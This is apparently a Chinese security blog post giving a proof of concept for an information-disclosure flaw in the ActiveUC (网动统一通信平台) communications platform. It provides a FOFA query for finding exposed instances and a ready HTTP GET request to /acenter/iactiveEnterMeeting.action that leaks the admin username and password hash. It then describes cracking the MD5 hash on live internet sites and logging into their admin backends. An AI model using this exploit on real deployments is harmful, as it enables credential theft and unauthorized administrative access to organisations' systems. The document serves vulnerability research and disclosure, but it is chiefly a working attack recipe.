网动统一通信平台(ActiveUC)接口iactiveEnterMeeting存在信息泄露漏洞

描述

网动统一通信平台是采用统一的通信平台,将VoIP电话系统、电子邮件等多种沟通方式融合的企业IT平台,接口/acenter/iactiveEnterMeeting.action?roomid=1&username=admin存在信息泄露漏洞,可能导致管理员密码泄露获取后台权限等。

fofa

title="网动统一通信平台(Active UC)"

POC

GET /acenter/iactiveEnterMeeting.action?roomid=1&username=admin HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

漏洞复现

在fofa中搜索资产,共有163条数据匹配

image-20241022094646012

以下为登录页面以及页面特征

image-20241022094729227

直接访问漏洞接口:/acenter/iactiveEnterMeeting.action?roomid=1&username=admin

image-20241022094804233

看返回页面什么信息泄露的内容,抓取当前页面的数据包查看

image-20241022094924691

这里看的确是泄露了用户名和密码,并且密码像是MD5加密的,对该段字符串进行MD5解密

image-20241022095237843

image-20241022095257675

均以失败告终,不清楚是版本进行升级了还是这个站点自己对密码进行其他方式加密了,尝试一下其他站点

image-20241022095500615

image-20241022095517976

换了一个站点是可以解密的,可能之前的站点密码过于复杂或者是另一种类似MD5的加密方式

拿到密码和用户名,尝试进行登录

image-20241022095803335

登录成功

posted @   LeouMaster  阅读(115)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示